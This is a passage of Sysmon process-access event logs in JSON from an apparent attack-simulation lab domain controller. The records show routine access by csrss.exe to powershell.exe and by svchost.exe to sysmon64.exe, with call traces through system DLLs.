tomation.ni.dll+97e334ac(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97eb5cd8(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97e2c094(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+988e5037(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97df488c(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97e52d5b(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97e363c0(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97e363c0(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97e363c0(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97e363c0(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97e363c0(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97e363c0(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97e36251(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97e281d6(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97e61366(wow64)","EventReceivedTime":"2020-08-01 05:52:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:48","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5541,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:48.250\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 1156\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-0330-5F25-0000-0010F49C0A00}\r\nTargetProcessId: 5052\r\nTargetImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:48.250","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"1156","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-0330-5F25-0000-0010F49C0A00}","TargetProcessId":"5052","TargetImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:52:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:48","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5542,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:48.250\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:48.250","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:48","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5543,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:48.250\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:48.250","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:48","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5544,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:48.250\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:48.250","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:48","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5545,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:48.250\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:48.250","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:48","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5546,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:48.250\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:48.250","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:48","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5547,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:48.250\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:48.250","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:48","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5548,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:48.250\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 